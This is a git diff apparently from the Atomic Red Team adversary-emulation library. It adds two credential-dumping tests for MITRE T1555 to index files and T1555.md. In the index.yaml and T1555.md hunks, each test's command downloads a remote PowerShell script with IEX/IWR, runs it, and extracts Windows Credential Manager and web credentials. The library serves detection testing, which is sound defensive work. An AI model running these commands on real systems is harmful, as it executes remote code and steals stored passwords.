diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 958c5b89..0eda063b 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -11,6 +11,8 @@ credential-access,T1552.001,Credentials In Files,3,Extracting passwords with fin
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 4835de52..cbe6e63b 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -3,6 +3,8 @@ credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt
credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
+credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
+credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index c55b55ee..f6da33e1 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -24,6 +24,8 @@
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+ - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+ - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #2: Search macOS Safari Cookies [macos]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index eeb67747..7bc31d02 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -12,6 +12,8 @@
- Atomic Test #4: Access unattend.xml [windows]
- [T1555 Credentials from Password Stores](../../T1555/T1555.md)
- Atomic Test #1: Extract Windows Credential Manager via VBA [windows]
+ - Atomic Test #2: Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] [windows]
+ - Atomic Test #3: Dump credentials from Windows Credential Manager With PowerShell [web Credentials] [windows]
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #1: Run Chrome-password Collector [windows]
- Atomic Test #3: LaZagne - Credentials from Browser [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 4ebeaa43..686e91a6 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -1055,6 +1055,32 @@ credential-access:
'
name: powershell
+ - name: Dump credentials from Windows Credential Manager With PowerShell [windows
+ Credentials]
+ auto_generated_guid: c89becbe-1758-4e7d-a0f4-97d2188a23e3
+ description: This module will extract the credentials from Windows Credential
+ Manager
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: "IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1'
+ -UseBasicParsing); Get-PasswordVaultCredentials -Force \n"
+ - name: Dump credentials from Windows Credential Manager With PowerShell [web
+ Credentials]
+ auto_generated_guid: 8fd5a296-6772-4766-9991-ff4e92af7240
+ description: This module will extract the credentials from Windows Credential
+ Manager
+ supported_platforms:
+ - windows
+ executor:
+ name: powershell
+ elevation_required: false
+ command: 'IEX (IWR ''https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1''
+ -UseBasicParsing); Get-CredManCreds -Force
+
+'
T1555.003:
technique:
created: '2020-02-12T18:57:36.041Z'
diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md
index c08e2e0b..76606bc1 100644
--- a/atomics/T1555/T1555.md
+++ b/atomics/T1555/T1555.md
@@ -6,6 +6,10 @@
- [Atomic Test #1 - Extract Windows Credential Manager via VBA](#atomic-test-1---extract-windows-credential-manager-via-vba)
+- [Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]](#atomic-test-2---dump-credentials-from-windows-credential-manager-with-powershell-windows-credentials)
+
+- [Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]](#atomic-test-3---dump-credentials-from-windows-credential-manager-with-powershell-web-credentials)
+
@@ -53,4 +57,52 @@ Write-Host "You will need to install Microsoft Word manually to meet this requir
+
+
+
+## Atomic Test #2 - Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #3 - Dump credentials from Windows Credential Manager With PowerShell [web Credentials]
+This module will extract the credentials from Windows Credential Manager
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force
+```
+
+
+
+
+
+